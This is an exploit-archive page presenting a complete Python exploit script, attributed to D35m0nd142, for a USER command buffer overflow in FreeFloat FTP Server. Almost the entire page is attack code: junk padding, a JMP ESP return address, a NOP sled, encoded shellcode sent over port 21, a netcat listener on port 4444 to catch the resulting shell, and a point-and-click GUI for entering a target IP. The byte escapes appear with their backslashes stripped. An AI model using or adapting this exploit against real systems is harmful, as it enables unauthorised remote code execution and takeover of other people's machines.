[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free Float FTP Server USER Command Buffer Overflow
# Published : 2012-12-09
# Author :
# Previous Title : WordPress WP-Property PHP File Upload Vulnerability
# Next Title : HP Data Protector DtbClsLogin Buffer Overflow
#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
os.system("clear")
def exploit():
target = ip.get()
junk = "x41" * 230 # Offest Number --> 230
eip = "x53x93x37x7E" # 0x7E379353 FFE4 JMP ESP
nops = "x90" * 20
payload =("xb8xe9x78x9dxdbxdaxd2xd9x74x24xf4x5ex2bxc9" +
"xb1x4fx31x46x14x83xc6x04x03x46x10x0bx8dx61" +
"x33x42x6ex9axc4x34xe6x7fxf5x66x9cxf4xa4xb6" +
"xd6x59x45x3dxbax49xdex33x13x7dx57xf9x45xb0" +
"x68xccx49x1exaax4fx36x5dxffxafx07xaexf2xae" +
"x40xd3xfdxe2x19x9fxacx12x2dxddx6cx13xe1x69" +
"xccx6bx84xaexb9xc1x87xfex12x5excfxe6x19x38" +
"xf0x17xcdx5bxccx5ex7axafxa6x60xaaxfex47x53" +
"x92xacx79x5bx1fxadxbex5cxc0xd8xb4x9ex7dxda" +
"x0exdcx59x6fx93x46x29xd7x77x76xfex81xfcx74" +
"x4bxc6x5bx99x4ax0bxd0xa5xc7xaax37x2cx93x88" +
"x93x74x47xb1x82xd0x26xcexd5xbdx97x6ax9dx2c" +
"xc3x0cxfcx38x20x22xffxb8x2ex35x8cx8axf1xed" +
"x1axa7x7ax2bxdcxc8x50x8bx72x37x5bxebx5bxfc" +
"x0fxbbxf3xd5x2fx50x04xd9xe5xf6x54x75x56xb6" +
"x04x35x06x5ex4fxbax79x7ex70x10x0cxb9xe7x5b" +
"xa7x44x78x33xbax46x69x98x33xa0xe3x30x12x7b" +
"x9cxa9x3fxf7x3dx35xeax9fxdexa4x71x5fxa8xd4" +
"x2dx08xfdx2bx24xdcx13x15x9exc2xe9xc3xd9x46" +
"x36x30xe7x47xbbx0cxc3x57x05x8cx4fx03xd9xdb" +
"x19xfdx9fxb5xebx57x76x69xa2x3fx0fx41x75x39" +
"x10x8cx03xa5xa1x79x52xdax0exeex52xa3x72x8e" +
"x9dx7ex37xbexd7x22x1ex57xbexb7x22x3ax41x62" +
"x60x43xc2x86x19xb0xdaxe3x1cxfcx5cx18x6dx6d" +
"x09x1exc2x8ex18")
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((target,21))
print "nn[-] Sending exploit ..."
print sock.recv(2000)
sock.send("USER "+junk+eip+nops+payload+"rn")
sock.close()
os.system("nc -lvp 4444")
except:
print "[-] Connection to "+target+" failed! n"
sys.exit(0)
root=Tkinter.Tk()
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()